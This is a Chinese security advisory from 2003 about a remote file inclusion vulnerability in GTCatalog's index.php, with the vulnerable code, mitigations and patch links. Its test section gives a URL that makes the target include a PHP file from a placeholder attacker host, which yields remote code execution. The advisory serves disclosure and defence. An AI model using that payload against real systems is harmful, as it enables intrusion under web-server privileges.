发布日期：2003-03-03
更新日期：2003-03-10

受影响系统：

GTCatalog GTCatalog 0.9.1
GTCatalog GTCatalog 0.9
GTCatalog GTCatalog 0.8.16

描述：

---

BUGTRAQ  ID: 6998

GTcatalog是一款基于WEB的目录管理软件。

Webchat中的index.php脚本对用户提交的URI参数缺少正确检查，远程攻击者可以利用这个漏洞提交恶意URI参数指定包含远程服务器上的文件，以WEB进程权限在系统上执行任意命令。

index.php脚本包含如下代码：

------------------------------------------------------------------------
[...]
switch ($function)
{

case "custom":

$cc    = new Template();
    $cc->set_file("head",$dir_base.$dir_template."header.inc");
    $cc->set_var(array(                              'clientcode' => $cfg_clientcode,
                                'title' => $cfg_title." - ".$custom));
$cc->parse("output","head");
$cc->p("output");

include($custom.".custom.inc");
include ($dir_base.$dir_template."footer.inc");

break;
[...]
------------------------------------------------------------------------

由于对$custom变量没有预定义，因此可以通过全局注入来进行变量定义，攻击者可以指定远程系统中的PHP文件作为参数提交给$custom变量，可导致以WEB进程权限执行PHP文件中包含的恶意代码。

<*来源：Frog Man （leseulfrog@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104671108708693&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Frog Man （leseulfrog@hotmail.com）提供了如下测试方法：

http://[target]/index.php?function=custom&custom=http://[attacker]/1

远程服务器上包含的文件为:

http://[attacker]/1.custom.inc

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 修改php.ini配置文件，设置'allow_url_fopen'和'register_globals'选项为'off'。

* Frog Man <leseulfrog@hotmail.com>提供如下第三方补丁：

http://www.phpsecure.info/v2/.php?zone=pDl&id=81

厂商补丁：

GTCatalog
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.geektweaked.com/gtcatalog/

浏览次数：3021
严重程度：0（网友投票）